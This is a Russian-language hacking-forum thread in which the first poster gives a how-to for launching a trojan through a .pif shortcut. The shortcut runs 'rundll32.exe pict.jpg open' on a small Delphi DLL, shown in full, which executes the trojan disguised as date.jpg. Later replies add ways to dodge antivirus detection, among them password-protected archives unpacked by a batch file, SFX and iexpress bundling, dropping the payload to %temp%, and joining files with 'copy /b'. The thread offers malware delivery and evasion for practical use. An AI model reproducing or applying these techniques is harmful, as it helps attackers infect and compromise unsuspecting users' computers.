• XSS.stack #1 – первый литературный журнал от юзеров форума

разведи на pif

Отслеживать
Noctambulaar

Noctambulaar

(L3) cache
Пользователь
Регистрация
06.06.2008
Сообщения
257
Реакции
5
Добрый день. Маленький мануал по загрузке трояна при помощи pif ярлыка(Да! именно ярлыка, без rename exe to pif). Проверялось только на nt, xp.

Юзер научился не запускать подозрительные exe файлы, а как насчет pif? Что мы видим в стаф к статье.. В архиве ниже лежат 3 файла:
1) date.jpg - это наш ехе файл (трой), просто переименованный в date.jpg
2) pict.jpg - это DLL которая будет загружать наш "date.jpg" запускать.
Исходник dll.dpr
library dll;
uses
  Windows;
procedure open; stdcall;
begin
Winexec('date.jpg', SW_show); // можно грузить например 123.avi в  итоге  в процессах висит 123.avi
end;
exports open;
begin
end.
3) mario.pif - наш PIF ярлык, в свойствах которого вкладка "программа" видим в поле команда следующий текст "rundll32.exe pict.jpg open". что это значит? это значит, что ярлык прописан, как коммандная строка на выполнение загрузки нашей DLL с функцией запуска трояна при помощи загрузки DLL через rundll32.exe.

Итог.
date.jpg
pict.jpg
mario.pif (иконку можно сменить)
(+ некоторые антивирусы просто не сканят jpg)

Даже сейчас это можно использовать, просто замените date.jpg на файл своего трояна. Юзер запустил mario.pif - троян "date.jpg" запущен. (v) Noctambulaar
 

Вложения

  • pif.zip
    1 019 байт · Просмотры: 190
Вместо .pif можно я так понимаю

.exe
.com
.bat
.scr
.cmd

а вместо .jpg хоть .куй
:tease:
 
идея интересная...

у меня нод очень даже спалил пинча с .jpg разширением...
но раз при открытии фоток пишет что открыть не удаеься создаеться некое палево у юзверя...

но если сделать заместо жепегов архивы... в которых лежат файлы например то пользователь ничего не заподозрит...


прикрутил архивы заместо жепега...


Добавлено в [time]1238964825[/time]
хотя по идее можно в длл как ресурс засунуть трой... а дллка будет его дропать и запускать.. будет меньше файлов и меньше палева имхо
 

Вложения

  • pif2.rar
    8.7 КБ · Просмотры: 179
вот доделал чуток терь два файлега и вроде без палева... )))

создаеться файл %temp%\111.exe
и запускаеться
 

Вложения

  • pif3.rar
    8.9 КБ · Просмотры: 166
Вместо .pif можно я так понимаю

.exe
.com
.bat
.scr
.cmd

Нельзя подобным способом, можно только .bat типа "rundll32.exe pict.jpg open". Ты несколько не понял, тут метод без переименования файла.

AHTOLLlKA
хотя по идее можно в длл как ресурс засунуть трой... а дллка будет его дропать и запускать..
Палева больше, быстро подобное спалится или уже подозрение на джоинер.

но если сделать заместо жепегов архивы... в которых лежат файлы например то пользователь ничего не заподозрит...
как будет угодно. Есть мысль насчет VBScript.. считай полиморф на загрузчик.. Будет что - напишу.


ps все же упор на то, что ваш троян не палится.
 
Палева больше, быстро подобное спалится или уже подозрение на джоинер.
ну не палица особо =) пинч что так что так палица.. в архиве кстать меньше на один антивирь )))

по вбсу интересно тоже... я вот пытаюсь присобачить как нить даунлодер но не знаю как из хекса в бинарник стандартными средствами конвернуть )))

так просто сказка будет )))
 
В архиве? ведь докучи всяких архивов, например MIME, UUE, XXE что тот же консольный винрар должен поддерживать.

system32\exe2bin.exe мало ли чем поможет, так и докучи всякого консольного, что может хоть как-то помоч.
 
В архиве? ведь докучи всяких архивов, например MIME, UUE, XXE что тот же консольный винрар должен поддерживать.
недогнал твой мысли.... =)

system32\exe2bin.exe мало ли чем поможет, так и докучи всякого консольного, что может хоть как-то помоч.
ога =((
 
Я думал, ты извращенец)
То есть бацаешь бинарник в архив с паролем и рядом консольный винрар
1) распаковка
2) запуск что распаковали

всё это рулится батником) :huh1:
 
Noctambulaar
То есть бацаешь бинарник в архив с паролем и рядом консольный винрар
1) распаковка
2) запуск что распаковали
Создаёшь архив с паролем, запаковываешь в sfx вместе с ярлыком, батником или консольным WinRAR, в свойствах sfx ставишь на исполнение)
 
ну и спалит антивирус сразу..
1) антивирус тоже сканит ресурсы
2) либо распакует и потом спалит

С таким же успехом можно заюзать стандартную вин утилиту iexpress в которой можно клеить файлы без палева с автозапуском.
 
...Ты несколько не понял, тут метод без переименования файла.


эт я так просто читал :rtfm:
просто глазаме провелъ :bang:

сорри за офф :crazy:


з.ы. помогите с http://xss.pro/index.php?topic=17212
или скажите кто, что это 100% не реально(((
 
Я думал, ты извращенец)
То есть бацаешь бинарник в архив с паролем и рядом консольный винрар
1) распаковка
2) запуск что распаковали

всё это рулится батником)
омфг..... не не я не такой наркаман....
просто "copy /b file1 + file2 file3"

вот и все...


это лучше чем картинка тем что файл настоящий и работает тоесть в архиве что то есть

а картинка не отображаеться и для юзеря все равно какоето палево...

а спалят так или иначе если файл палица хоть картинка хоть архив хоть подпаролем но при запуске аларм..))
 
Noctambulaar
ну и спалит антивирус сразу..
1) антивирус тоже сканит ресурсы
2) либо распакует и потом спалит
Способ сокращения результирующих файлов.
Если спалит при распаковке спалит и ствоим методом)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх